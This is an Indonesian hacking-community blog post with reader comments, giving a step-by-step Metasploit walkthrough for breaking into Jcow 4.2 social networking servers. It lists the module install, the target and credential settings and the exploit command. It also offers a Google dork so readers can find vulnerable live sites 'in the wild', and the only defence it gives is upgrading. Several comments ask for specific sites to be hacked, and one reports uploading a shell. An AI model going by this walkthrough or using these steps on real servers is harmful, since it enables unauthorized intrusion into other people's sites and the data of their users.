Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Hacking Jcow Social Networking Webserver

10 September 2011
Penulis:   · Kategori Artikel: Hacking

BINUS HACKER Binus Hacker Is Not Criminal Banner





Apakah teman-teman pernah melihat CMS yang satu ini?

Jcow social networking…Ya, memang demikian namanya… Jcow menawarkan aplikasi berbasis web untuk situs jejaring sosial secara gratis alias free dan bisa dilihat di websitenya jcow.net dengan ukuran file yang cukup kecil hanya 777KB tidak lebih dari 1 MB.

Jcow

Tapi disini yang akan saya bahas bukanlah mengenai penggunaan dari si Jcow ini sebagai situs pertemanan, melainkan terdapatnya suatu vulnerability dari beberapa versi dari Jcow yang ternyata dapat disusupi hanya dalam 4 langkah , dan bahkan si penyusup dapat melihat isi direktori web server korban(jika ternyata servernya pun tidak menerapkan pengamanan yang baik).

Pada contoh yang akan saya buat dibawah ini, korban menggunakan IP : 192.168.8.94…
Jauh lebih baik kalau kawan-kawan mau belajar menggunakan virtual lab terlebih dahulu, tapi kalau ternyata penasaran ingin langsung to the wild arena, kawan-kawan juga bisa cari via google dork : “Powered by Jcow 4.2.0“. Jika tertarik untuk langsung ke dunia nyata, kawan-kawan juga harus mempelajari logika dari teknik penyerangan via internet(klik disini)

O.S Penyerang : BT 5 R1
O.S Korban : XP SP3
Aplikasi vulnerable : Jcow 4.2

Pada artikel ini juga saya sebelumnya sudah membuat username : “victim dan password :”victim” pada aplikasi Jcow target.

Oke kita mulai langkah demi langkahnya dibawah ini

Kebutuhan :
1. Metasploit Framework (metasploit.com)
2. Script exploit jcow.rb (link mediafire di website asalnya)

Langkah-Langkahnya :
1. Copykan file exploit jcow.rb yang sudah di-download kedalam folder /pentest/exploits/framework/modules/exploits/remote/

cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/

Jika bingung bagaimana cara meng-copy kan file exploit.rb kedalam Backtrack Linux, kawan-kawan bisa lihat tutorialnya disini.

2. Buka metasploit console dengan mengetikkan msfconsole pada terminal, lalu gunakan exploit yang sebelumnya sudah kita copy tadi.

msf > use exploit/remote/jcow

3. Selanjutnya ketikkan perintah show options untuk melihat switch apa saja yang dapat digunakan untuk exploit ini.

msf exploit(jcow) > set rhost 192.168.8.94 –> target IP
rhost => 192.168.8.94
msf exploit(jcow) > set username victim –> set username
username => victim
msf exploit(jcow) > set password victim –> set password
password => victim

4. Yep setelah semuanya selesai dikonfigurasi dengan baik, langkah terakhir tinggal menjalankan perintah exploit pada konsol metasploit.

Berhasil

Pengamanan :
1. Upgrade Jcow ke versi terbaru

Sumber : vishnuvalentino.com

BINUS HACKER Binus Hacker Chat and Forum

Komentar

20 Komentar Untuk “Hacking Jcow Social Networking Webserver
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. LH pada 10 September 2011 7:34 am

    ada postingan bru,
    bgus gan

  2. junior pada 10 September 2011 5:11 pm

    weww,, mantap gan,,

  3. gann pada 12 September 2011 4:00 am

    sadisss…….mantap gan…

  4. RootBearCool pada 12 September 2011 9:34 am

    gan sorry nih OOT dkit pengen nanya dong cara install Backtrack 5 R1 dari usb/dvd/cd caranya gmn y>?

  5. HATTAFGEN pada 14 September 2011 5:26 am

    ITU JCOW SAPA ,SIAPA YANG BUAT,???

  6. ogel pada 10 October 2011 6:02 am

    ikutan belajar dong tentang hakkr nya??

  7. Kondong pada 11 December 2011 1:41 am

    Mohon pak di hack site malay ni http://xtweets.tk user2nya tidak enak smuanya

  8. supri slankers pada 16 December 2011 6:52 pm

    mau dong jd angota hacker, n belajar byk…

  9. ying pada 10 February 2012 3:51 am

    tolong posting hack mig33 dung..

  10. Bayu Smith pada 12 February 2012 6:15 am

    postingannya belum ada yang baru ya gan?

  11. christian pada 14 February 2012 11:07 pm

    saya ingin menjadi anggota binus hacker
    please

  12. nandareynaldi pada 15 February 2012 2:45 am

    @christian: Anda sudah berkunjung Kemari, dengan itu anda sudah menjadi Anggota Binus Hacker

  13. adit pada 27 February 2012 10:47 am

    bagus trick nya.gw cba berhasil:D

  14. Ilham Mafani Nadif pada 25 August 2012 11:26 pm

    Kalo saya pake backtrack r2 copykan file exploit jcow.rb ke folder mana ya? soalnya saya ga nemuin folder di atas. Mohon bantuanya master

  15. Ilham Mafani Nadif pada 8 September 2012 7:13 pm

    saya sudah berhasil..
    tapi hanya keluar cookie..
    dan di situ bisa langsung upload shell..

    yang jadi pertanyaan bagaimana biar kita langsung bisa upload shell kaya yang di atas?

  16. sigit pada 3 December 2012 1:53 am

    wah makash bgt gan infonya,,
    jdi tmbh ilmu ni..
    thx

  17. fitra pada 16 February 2013 6:18 pm

    arttikel nya keren gan

  18. fitra pada 16 February 2013 6:20 pm

    keren gan gabung juga di jcow ku ya

  19. Waldo pada 27 June 2013 6:26 pm

    I enjoy checking your website. Thanks!

  20. Ebony pada 27 June 2013 7:07 pm

    You have great information right here.

Silahkan Berikan Tanggapan Anda...